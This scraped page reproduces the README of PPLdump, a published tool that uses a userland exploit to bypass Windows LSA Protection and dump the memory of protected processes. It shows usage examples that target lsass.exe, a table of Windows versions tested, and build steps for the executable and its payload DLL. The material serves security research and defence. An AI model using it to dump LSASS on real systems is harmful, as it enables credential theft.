.webp "Arena-Hard-Auto : Advancing LLM Evaluation With Style Control Integration")
.webp "How To Install/Run – Streamlining OSINT Workflows For Enhanced Capabilities")
PPLdump implements a userland exploit that was initially discussed by James Forshaw (a.k.a. @tiraniddo) – in this blog post – for dumping the memory of any PPL as an administrator.
I wrote two blog posts about this tool. The first part is about Protected Processes concepts while the second one dicusses the bypass technique itself.
- Blog post part #1: Do You Really Know About LSA Protection (RunAsPPL)?
- Blog post part #2: Bypassing LSA Protection in Userland
Usage
Simply run the executable without any argument and you will get a detailed help/usage.
c:\Temp>PPLdump64.exe
_
| _ | _ | | | | _ _
| | | || . | | | | . | version 0.4 || || |||__|||| | by @itm4n
|_|
Description:
Dump the memory of a Protected Process Light (PPL) with a userland exploit
Usage:
PPLdump.exe [-v] [-d] [-f]
Arguments:
PROC_NAME The name of a Process to dump
PROC_ID The ID of a Process to dump
DUMP_FILE The path of the output dump file
Options:
-v (Verbose) Enable verbose mode
-d (Debug) Enable debug mode (implies verbose)
-f (Force) Bypass DefineDosDevice error check
Examples:
PPLdump.exe lsass.exe lsass.dmp
PPLdump.exe -v 720 out.dmp
Tests
| Windows version | Build | Edition | Arch | Admin | SYSTEM |
|---|---|---|---|---|---|
| Windows 10 20H2 | 19042 | Pro | x64 | ✔️ | ✔️ |
| Windows 10 20H2 | 19042 | Pro | x86 | ✔️ | ✔️ |
| Windows 10 1909 | 18363 | Pro | x64 | ✔️ | ✔️ |
| Windows 10 1507 | 10240 | Educational | x64 | ✔️ | ✔️ |
| Windows 10 1507 | 10240 | Home | x64 | ✔️ | ✔️ |
| Windows 10 1507 | 10240 | Pro | x64 | ✔️ | ✔️ |
| Windows Server 2019 | 17763 | Standard | x64 | ✔️ | ✔️ |
| Windows Server 2019 | 17763 | Essentials | x64 | ✔️ | ✔️ |
| Windows 8.1 | 9600 | Pro | x64 | ⚠️ | ⚠️ |
| Windows Server 2012 R2 | 9600 | Standard | x64 | ⚠️ | ⚠️ |
The exploit fails on fully updated Windows 8.1 / Server 2012 R2 machines. I have yet to figure out which patch caused the error.
[-] DefineDosDevice failed with error code 6 – The handle is invalid.
On Windows 8.1 / Server 2012 R2, you might also have to compile the binary statically (see “Build instructions” below).
Build Instructions
This Visual Studio Solution comprises two projects (the executable and a payload DLL) that need to be compiled in a specific order. Everything is pre-configured, so you just have to follow these simple instructions. The compiled payload DLL is automatically embedded into the final executable.
- Open the Solution with Visual Studio 2019.
- Select
Release / x64orRelease / x86depending on the architecture of the target machine. Build > Build Solution.
On Windows 8.1 / Server 2012 R2, you might have to compile the binary statically.
- Right-click on the
PPLdumpproject. - Go to
Configuration Properties>C/C++>Code Generation. - Select
Multi-threaded (/MT)as theRuntime Libraryoption. - Build the Solution.
.webp "Banshee – A Foray Into Kernel-Level Power With Rootkit Techniques")
.webp "Bomber : Navigating Security Vulnerabilities In SBOMs")
